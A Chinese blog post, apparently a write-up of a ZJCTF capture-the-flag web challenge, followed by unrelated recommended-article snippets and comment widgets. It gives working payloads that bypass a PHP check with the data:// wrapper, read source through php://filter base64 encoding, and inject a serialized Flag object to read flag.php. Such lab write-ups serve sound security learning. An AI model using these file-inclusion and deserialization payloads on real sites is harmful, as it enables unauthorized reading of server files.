【无标题】

最新推荐文章于 2024-05-18 00:53:54 发布
原创 最新推荐文章于 2024-05-18 00:53:54 发布 · 94 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络安全

文章讲述了如何通过使用POST请求和数据伪协议来绕过GET方法的限制,结合文件包含漏洞利用php://filter进行Base64编码读取文件。接着展示了如何通过反序列化技巧获取Flag类的文件内容,从而达到目标。最终payload通过去掉不必要的编码部分,成功展示flag。

打开靶机。

0a6d0ac261e74c0697e5e9ed22a833fd.png

代码审计题。以get方法提交"text" ,"file"和"password"。接下来是如果提交的text内容是 welcome to the zjctf,则输出welcome to the zjctf。如果在提交的file中匹配到了flag,则输出not now并推出。然后可以看出下面是一个文件包涵还有反序列化。

我们开始绕过。第一个绕过就是用post方式提交text的数据就行了,这里我们用data伪协议就行。然后是文件包涵,我们用filter伪协议读取useless.

phppayload:?text=data://text/plain,welcome to the zjctf&file=php://filter/read=convert.base64-encode/resource=useless.php

9f32ebe53887431b8496742e16a8d883.png

 我们进行base64解密。

<?php  

class Flag{ //flag.php  

    public $file;  

    public function __tostring(){  

        if(isset($this->file)){  

            echo file_get_contents($this->file); 

            echo "<br>";

        return ("U R SO CLOSE !///COME ON PLZ");

        }  

    }  

}  

?>

从代码中可以看出我们要传的password的内容是序列化的:Flag类flag.php元。构造为:

O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}

所以payload:

?text=data://text/plain,welcome to the zjctf&file=useless.php&password=O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}

这里我们去掉php://filter/read=convert.base64-encode/resource=这部分。第一是因为这部分的任务完成了,第二是因为加上这部分没法得到flag。我们按f12查看flag。

 

寡人略秀
关注
Qt-无标题窗口
学而思
05-21 8817
        今天学习了下无标题窗口,于是来记录下我的学习过程首先建立一个Qt Widgets Application继承QWidget类创建完后直接运行就得到了如下效果那么,既然是无标题窗口就要去掉窗口栏啊,于是加上setWindowFlags(Qt::FramelessWindowHint | Qt::WindowMinimizeButtonHint);去掉标题栏,但是这样整个窗口就不能移动...
C# 移动无标题栏无边框窗体的3种方法
SabreWulf
03-13 2520
目录 第一种:手工移动 第二种:调用系统API 1.引入下面代码 前提需要引入命名空间using System.Runtime.InteropServices 2.增加鼠标按下事件发送消息,让系统误以为按下是标题栏 第三种,重写 WndProc 第一种:手工移动 直接通过修改窗体位置从而达到移动窗体的效果 //定义一个位置信息Point用于存储鼠标位置 private Point mPoint; /// <summary>
谷歌浏览器打开无标题
mp2020xuexi的博客
01-16 2223
谷歌浏览器
无标题】好用的网站
qq_67243927的博客
05-18 2989
STL reference:https://tool.oschina.net/uploads/apidocs/cpp/en/cpp.html
C#中实现无标题栏窗体拖动的代码
热门推荐
百锦再的博客
01-18 1万+
事件来实现拖动功能。当鼠标按下时,我们标记鼠标正在拖动,并保存当前坐标。在鼠标移动时,如果鼠标正在拖动,我们更新窗体的位置,使其跟随鼠标移动。当鼠标释放时,我们取消拖动标记。请注意,在窗体上添加了对应事件处理程序的窗体控件属性应该设置为对应的事件处理程序方法。在窗体设计视图,选择属性窗格,在事件选项卡中为。在C#中实现无标题栏窗体拖动的代码可以通过处理鼠标事件来实现。这样,当你在运行窗体时,你就可以通过鼠标拖动窗体来改变其位置。事件分别选择对应的处理程序方法。在这个示例代码中,我们通过处理。
无标题】一不错的网站
shen_haidabiaoge的博客
05-18 3036
大家要谅解我呀,我这是没有办法
Qt实现改变无标题栏窗体大小及移动窗体
danshiming的博客
11-10 4878
Qt实现鼠标左键拖动无标题栏窗体右下角改变窗体大小及移动窗体
WIN32无标题栏窗口移动方法种种
ZDT_zdh的博客
11-02 3358
WIN32无标题栏窗口移动方法种种 转载来源:http://blog.youkuaiyun.com/fuyun_cloud/article/details/8008197     首先,看看在正常情况下系统是怎样来移动程序窗口的。当使用者在程序窗口标题栏区域(非工作区)内,按下鼠标左键时将会发生下列事情:  ◆ 系统向该窗口过程函数发送WM_NCLBUTTONDOWN消息。  ◆ WM_NC...
Chrome显示无标题错误代码STATUS_INVALID_IMAGE_HASH
precy_wm的博客
01-03 2885
Chrome显示无标题错误代码STATUS_INVALID_IMAGE_HASH
c#实现无标题栏窗口的拖动
09-05
本篇文章将详细讲解如何在C#中实现这种无标题栏窗口的拖动以及其他基本操作。 首先,为了实现无标题栏窗口的拖动,我们需要处理窗体的鼠标事件。窗体的`FormBorderStyle`属性应设置为`None`,这会去除窗体的边框和...
Qt无标题窗口
05-21
在本文中,我们将深入探讨如何使用Qt框架创建一个无标题窗口,这在界面设计和自定义标题栏美化中非常有用。我们将关注`framelesswidget.cpp`、`main.cpp`、`framelesswidget.h`等核心文件,理解它们在实现无标题窗口...
精选资源
C#创建无标题栏窗体
03-16
摘要:C#源码,菜单窗体,无标题栏窗体 C#创建无标题栏窗体源码,实际上是动态显示或隐藏窗体的标题栏,当隐藏的时候就类似窗体没有了标题栏,当显示标题栏的时候,鼠标按住标题栏即可拖动窗体,以前记得网友需要此...
精选资源
Delphi实现拖动按钮移动无标题栏窗口
05-11
摘要:Delphi源码,界面编程,窗体拖动,无标题无标题栏的窗体的拖动功能实现,Delphi添加一个可拖动窗体的按钮,通过对此按钮的控制可移动窗体,实现按住标题栏移动窗口的功能,无标题栏也就不能显示最大化、最小化...
VC去掉'无标题'字样的方法.zip
11-21
在使用Visual C++进行编程时,我们经常会在创建新的窗口或者对话框时默认看到标题栏显示为“无标题”。这可能会对用户界面的美观性和专业性造成一定的影响。本资料包提供了一种方法来帮助开发者去掉这个“无标题”...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8854
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
大校财经系统是一个由财经爱好者独立开发的综合性股票投资信息聚合与辅助决策平台_该平台核心功能包括实时聚合全网各大财经网站的股票相关新闻知名财经大V与分析师的专业文章与深度评论每.zip
12-29
大校财经系统是一个由财经爱好者独立开发的综合性股票投资信息聚合与辅助决策平台_该平台核心功能包括实时聚合全网各大财经网站的股票相关新闻知名财经大V与分析师的专业文章与深度评论每.zip
【分布式系统】基于RocketMQ事务消息的最终一致性实现:计算机竞赛中高可靠业务逻辑设计与复杂事件处理
12-29
内容概要:本文深入探讨了RocketMQ消息队列在计算机竞赛中的高级应用,聚焦于分布式事务解决方案(事务消息)与复杂事件处理(CEP)能力。通过“下单扣库存”这一典型场景的代码案例,详细解析了RocketMQ事务消息的“半消息”机制、本地事务执行、回查逻辑及最终一致性实现,强调其在高可靠性与复杂业务编排中的核心作用。同时介绍了死信队列、异步处理模式和容错设计等关键技术点,展现了如何利用RocketMQ构建健壮、可扩展的竞赛级系统。; 适合人群:具备一定Java和Spring Boot开发经验,熟悉微服务与消息队列基础,参与过或准备参加系统设计类计算机竞赛的研发人员或学生团队; 使用场景及目标:①解决跨服务数据一致性难题,如模拟银行转账、电商订单与库存协同;②设计具备最终一致性和高可用性的分布式系统架构,在竞赛中赢得“架构设计”高分;③掌握事务消息、回查机制、异步解耦等核心技术的实际编码与调试能力; 阅读建议:此资源以实际代码驱动理解,建议结合Spring Cloud Alibaba RocketMQ环境动手实践,重点关注TransactionListener接口的实现逻辑与网络异常下的回查机制,深入体会“半消息”在保障分布式事务中的关键价值。
pwinpcaincpaincpaiwnc
最新发布
12-29
pwinpcaincpaincpaiwnc
Qt自定义无标题窗口实现与界面美化技巧
以上就是从给定文件信息中提取的相关知识点,对于想要创建和使用Qt无标题窗口的开发者来说,这些知识点不仅能够帮助他们理解无标题窗口的实现原理和方法,还能够指导他们如何管理Qt项目文件以及如何使用版本控制系统...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值